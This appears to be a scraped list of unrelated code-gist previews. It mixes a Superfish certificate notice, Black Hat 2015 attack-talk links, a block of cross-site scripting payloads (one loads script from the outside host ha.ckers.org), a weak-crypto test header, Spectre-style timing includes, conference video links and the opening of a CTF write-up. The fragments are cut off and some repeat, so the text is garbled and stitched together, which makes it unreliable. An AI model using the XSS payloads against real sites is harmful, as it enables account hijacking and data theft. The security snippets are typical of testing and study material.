superfish.pem
contains:
- the Superfish certificate as found by both Chris Palmer and Matt Burke;
- the encrypted private key as found by Karl Koscher.
$ openssl x509 -in superfish.pem -text
Certificate:
Data:
Version: 3 (0x2)
superfish.pem
contains:
$ openssl x509 -in superfish.pem -text
Certificate:
Data:
Version: 3 (0x2)
https://www.blackhat.com/us-15/briefings.html | |
- https://www.blackhat.com/docs/us-15/materials/us-15-Silvanovich-Attacking-ECMA-Script-Engines-With-Redefinition.pdf | |
- https://www.blackhat.com/docs/us-15/materials/us-15-Silvanovich-Attacking-ECMA-Script-Engines-With-Redefinition-wp.pdf | |
- https://www.blackhat.com/docs/us-15/materials/us-15-Nafeez-Dom-Flow-Untangling-The-DOM-For-More-Easy-Juicy-Bugs.pdf | |
- https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf | |
- https://www.blackhat.com/us-15/briefings.html#bypass-surgery-abusing-content-delivery-networks-with-server-side-request-forgery-ssrf-flash-and-dns (no slides) | |
- https://www.blackhat.com/docs/us-15/materials/us-15-Vandevanter-Exploiting-XXE-Vulnerabilities-In-File-Parsing-Functionality.pdf | |
- https://www.blackhat.com/docs/us-15/materials/us-15-Vandevanter-Exploiting-XXE-Vulnerabilities-In-File-Parsing-Functionality-tool.zip | |
- https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry |
Hello software developers,
Please check your code to ensure you're not making one of the following mistakes related to cryptography.
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
// randomString(length) | |
// -------------------- | |
// | |
// Generates and returns a cryptographically secure | |
// uniform alphanumeric random string. | |
// | |
// Examples: | |
// | |
// randomString(14) // "oXYWpc1vODNR3M" | |
// randomString.hex(8) // "663c722b65943b9b" |
(25500) Project Rider - Hadi Hari https://vimeo.com/151644168 | |
(6802) What’s new in Security in ASP.NET 5 and MVC 6 - Dominick Baier https://vimeo.com/154041158 | |
(5972) Saying “Goodbye” to DNX and “Hello!” to the .NET Core CLI - Damian Edwards & David Fowler https://vimeo.com/153212604 | |
(3813) Fun with Generics - Benjamin Hodgson https://vimeo.com/154564491 | |
(3686) Keynote NDC London 2016: JavaScript, The Cloud, and the Rise of the New Virtual Machine - Scott Hanselman https://vimeo.com/153120762 | |
(3479) Introduction to IdentityServer - Brock Allen https://vimeo.com/154172925 | |
(2980) Aurelia: Next-Generation Web Apps - Rob Eisenberg https://vimeo.com/153090562 | |
(2118) Better single-page apps with ASP.NET MVC 6 - Steve Sanderson https://vimeo.com/157273325 | |
(1741) A brief history of ASP.NET: From 1.0 to 5.0 - Damian Edwards and David Fowler https://vimeo.com/154034601 | |
(1636) JavaScript Combinators, the “Six” Edition - Reginald Braithwaite https://vimeo.com/153097877 |
import org.junit.Test; | |
import java.util.ArrayList; | |
import java.util.Random; | |
import static org.junit.Assert.assertEquals; | |
import static org.junit.Assert.assertTrue; | |
public class Vulnerability_Weak_Crypto { |
public static class CurryExtensions | |
{ | |
public static Func<T1, TR> Curry<T1, TR>(this Func<T1, TR> f) => f; | |
public static Func<T1, Func<T2, TR>> Curry<T1, T2, TR>(this Func<T1, T2, TR> f) => | |
a1 => a2 => f(a1, a2); | |
public static Func<T1, Func<T2, Func<T3, TR>>> Curry<T1, T2, T3, TR>(this Func<T1, T2, T3, TR> f) => | |
a1 => a2 => a3 => f(a1, a2, a3); |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt",on) | |
#else | |
#include <x86intrin.h> /* for rdtscp and clflush */ | |
#endif |
This is a writeup of how I went about solving the web challenge from the h1-702 CTF, including my thought process as I navigated through the wrong and right paths to reach a solution. If you're only interested in what the correct steps were, skip to the TL;DR at the end.
Upon navigating to the challenge URL, we're greeted with a message:
Notes RPC Capture The Flag Welcome to HackerOne's H1-702 2018 Capture The Flag event. Somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden. The goal is to obtain the flag. Good luck, you might need it.